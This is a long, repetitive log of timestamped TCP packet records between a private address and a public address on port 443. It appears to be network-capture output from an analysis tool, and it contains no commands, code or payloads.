                                                                        Dec 17, 2024 08:38:39.231288910 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.231328011 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.235935926 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.235953093 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.236052036 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.236061096 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.236202955 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.239470005 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.239486933 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.239584923 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.239592075 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.239635944 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.244204044 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.244221926 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.244317055 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.244323969 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.244369030 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.248012066 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.248028994 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.248075008 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.248080969 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.248094082 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.248110056 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.410671949 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.410703897 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.411514997 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.411534071 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.411672115 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.415242910 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.415270090 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.415349007 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.415359020 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.415630102 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.419184923 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.419204950 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.419270039 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.419276953 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.419672966 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.423907042 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.423926115 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.424088001 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.424094915 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.424331903 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.427783012 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.427807093 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.427895069 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.427901030 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.428132057 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.430762053 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.432219028 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.432239056 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.432292938 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.432297945 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.432367086 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.436060905 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.436083078 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.436187983 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.436193943 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.436258078 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.440807104 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.440824986 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.440890074 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.440896988 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.440941095 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.440941095 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.602950096 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.602986097 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.603084087 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.603084087 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.603091002 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.603152990 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.607625961 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.607645988 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.607753992 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.607758999 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.607803106 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.611526012 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.611541986 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.611582994 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.611593008 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.611627102 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.611675024 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.616316080 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.616339922 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.616400957 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.616409063 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.616494894 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.620121956 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.620136976 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.620188951 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.620201111 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.620239973 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.624578953 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.624598026 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.624644041 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.624655962 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.624716997 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.628516912 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.628535032 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.628632069 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.628632069 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.628638983 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.628676891 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.633234978 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.633251905 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.633301020 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.633312941 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.633440018 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.795422077 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.795445919 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.795552969 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.795552969 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.795563936 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.795722008 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.799166918 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.799185038 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.799330950 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.799335957 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.799370050 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.803858995 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.803881884 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.803947926 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.803956032 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.804011106 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.804011106 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.807742119 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.807760000 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.807857037 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.807863951 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.808011055 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.812452078 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.812470913 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.812530041 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.812553883 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.812592030 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.812592030 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.816874027 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.816891909 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.816946030 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.816953897 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.816984892 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.817030907 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.820795059 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.820815086 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.820936918 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.820945024 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.820996046 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.825484037 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.825511932 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.825582981 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.825589895 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.825629950 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.825629950 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.987085104 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.987113953 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.987215996 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.987215996 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.987231016 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.987267017 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.991792917 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.991812944 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.991904020 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.991918087 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.992038012 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.995646000 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.995670080 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.995728970 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:39.995754004 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:39.996248960 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.000389099 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.000406981 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.000483036 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.000495911 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.000545979 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.004265070 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.004288912 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.004326105 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.004347086 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.004363060 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.004688025 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.008754969 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.008773088 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.008867025 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.008867025 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.008878946 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.008935928 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.013492107 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.013509989 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.013555050 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.013573885 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.013587952 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.013617992 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.017369032 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.017386913 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.017477036 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.017477036 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.017483950 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.017718077 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.180195093 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.180203915 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.180311918 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.180327892 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.180341005 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.180485010 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.183937073 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.183957100 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.184012890 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.184030056 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.184073925 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.184073925 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.188669920 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.188688040 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.188831091 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.188838959 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.189030886 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.192553997 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.192569971 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.192646980 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.192653894 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.192697048 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.197263002 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.197278976 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.197343111 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.197350025 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.197431087 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.200843096 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.200860023 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.200963974 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.200972080 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.201116085 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.205545902 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.205569983 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.205605984 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.205614090 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.205655098 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.209515095 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.209531069 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.209593058 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.209600925 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.209639072 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.372467995 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.372502089 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.372539043 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.372549057 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.372586012 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.376307011 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.376326084 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.376384974 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.376391888 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.376430035 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.380155087 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.380172014 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.380247116 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.380261898 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.380294085 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.380311966 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.384902954 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.384921074 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.384965897 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.384980917 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.385056973 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.385118961 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.388747931 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.388763905 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.388859987 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.388876915 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.388914108 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.393202066 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.393219948 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.393260002 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.393268108 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.393304110 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.397875071 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.397893906 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.397978067 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.397990942 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.398030996 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.401763916 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.401782990 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.401870966 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.401879072 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.401917934 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.564671040 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.564698935 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.564749956 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.564778090 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.564829111 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.564829111 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.568567038 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.568593025 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.568633080 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.568645000 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.568684101 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.568705082 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.572370052 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.572401047 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.572432041 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.572443008 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.572487116 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.577152014 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.577169895 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.577245951 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.577259064 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.577297926 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.580974102 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.580997944 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.581104040 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.581104040 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.581113100 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.581161022 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.585383892 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.585403919 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.585448027 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.585464954 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.585491896 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.585510015 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.590143919 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.590163946 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.590269089 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.590290070 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.590327024 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.593985081 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.594002962 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.594086885 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.594101906 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.594146013 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.756861925 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.756887913 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.756938934 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.756952047 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.757009029 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:40.760689974 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:40.760710001 CET44349716188.114.96.6192.168.2.12
